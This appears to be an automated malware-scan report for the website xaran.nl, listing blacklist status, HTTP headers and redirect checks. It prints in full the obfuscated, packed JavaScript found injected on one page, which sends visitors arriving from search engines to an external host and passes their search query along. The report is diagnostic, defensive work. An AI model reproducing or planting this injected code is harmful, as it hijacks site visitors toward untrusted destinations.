Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xaran.nl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://xaran.nl/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.xaran.nl/ | HTTP/1.1 200 OK Connection: close Date: Mon, 02 Mar 2015 12:40:25 GMT Accept-Ranges: bytes ETag: "57212d8-2c8-4cf771f01d341" Server: Apache/2.2.16 (Debian) Content-Length: 712 Content-Type: text/html Last-Modified: Tue, 27 Nov 2012 10:00:35 GMT | clean |
http://www.xaran.nl/xaran | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 02 Mar 2015 12:40:25 GMT Location: http://www.xaran.nl/xaran/ Server: Apache/2.2.16 (Debian) Content-Length: 312 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.xaran.nl/xaran/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 02 Mar 2015 12:40:26 GMT Location: http://xaran.nl/xaran/ Server: Apache/2.2.16 (Debian) Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=f2b3ac06fef0e0972f872bf528f60894; path=/; HttpOnly X-Pingback: http://xaran.nl/xaran/xmlrpc.php X-Powered-By: PHP/5.3.28-1~dotdeb.0 | clean |
http://xaran.nl/xaran/ | 200 OK Content-Length: 18470 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{})) Antivirus reports:
| ||
http://xaran.nl/xaran | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 02 Mar 2015 12:40:28 GMT Location: http://xaran.nl/xaran/ Server: Apache/2.2.16 (Debian) Content-Length: 304 Content-Type: text/html; charset=iso-8859-1 | clean |
http://xaran.nl/test404page.js | 404 Not Found Content-Length: 286 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xaran.nl
Result:
GET / HTTP/1.1
Host: xaran.nl
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: xaran.nl
Referer: http://www.google.com/search?q=xaran.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xaran.nl
Referer: http://www.google.com/search?q=xaran.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.